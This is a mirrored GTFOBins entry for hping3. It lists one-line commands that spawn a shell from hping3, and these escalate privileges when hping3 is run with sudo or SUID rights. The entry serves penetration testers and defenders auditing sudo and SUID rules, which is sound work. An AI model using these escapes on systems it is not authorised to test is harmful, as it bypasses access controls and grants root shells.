1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-09 00:41:33 +01:00
GTFOBins.github.io/_gtfobins/hping3.md
2021-01-18 09:19:35 +01:00

16 lines
189 B
Markdown

---
functions:
shell:
- code: |
hping3
/bin/sh
suid:
- code: |
./hping3
/bin/sh -p
sudo:
- code: |
sudo hping3
/bin/sh
---